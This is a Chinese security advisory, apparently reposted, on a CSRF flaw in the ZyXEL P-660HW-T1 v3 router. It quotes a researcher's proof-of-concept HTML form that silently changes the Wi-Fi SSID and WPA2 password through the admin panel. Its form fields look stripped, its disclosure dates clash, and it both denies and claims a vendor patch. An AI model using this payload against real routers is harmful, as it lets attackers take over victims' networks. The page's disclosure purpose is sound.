T1 v3无线路由器CSRF漏洞

发布日期:2014-05-29
更新日期:2014-05-31

受影响系统:
ZyXEL P-660HW-T1 v3
描述:
--------------------------------------------------------------------------------
Zyxel P-660HW-T1是无线路由器产品。

P-660HW-T1无线路由器版本3的管理面板存在安全漏洞,攻击者可利用此漏洞在受影响设备上执行任意代码。
 
<*来源:Mustafa ALTINKAYNAK
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Mustafa ALTINKAYNAK ()提供了如下测试方法:
 
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
 # Date: 05/22/2014
 # Author: Mustafa ALTINKAYNAK
 # Vendor Homepage:?t=p
 # Category: Hardware/Wireless Router
 # Tested on: Zyxel P-660HW-T1 v3 Wireless Router
 # Patch/ Fix: Vendor has not provided any fix for this yet
 ---------------------------
 
 Technical Details
 ---------------------------
 This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
 You can send the form below to prepare the target. Please offending. Being partners in crime.

Disclosure Timeline
 ---------------------------
 05/21/2014  Contacted Vendor
05/22/2014  Vendor Replied
 04/22/2014  Vulnerability Explained (No reply received)
 05/23/2014  Full Disclosure

Exploit Code
---------------------------
 
 Change Wifi (WPA2/PSK) password & SSID by CSRF
 ---------------------------------------------------------------------------------
 <html>
 <body>
 <form action="http://192.168.1.1/Forms/WLAN_General_1"
 method="POST">
 <input type="hidden" value="on">
 <input type="hidden" value="00000005">
 <input type="hidden" value="WIFI NAME">
 <input type="hidden" value="00000002">
 <input type="hidden" value="0">
 <input type="hidden" value="123456">
 <input type="hidden" value="1800">
 <input type="hidden" value="00000000">
 <input type="hidden" value="Uygula">
 </form>
 </body>
 </html>

-----------

Mustafa ALTINKAYNAK
 twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
 

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
ZyXEL
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
?t=p

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/14f4bf684e64f10849566c4a6e8ec9a9.html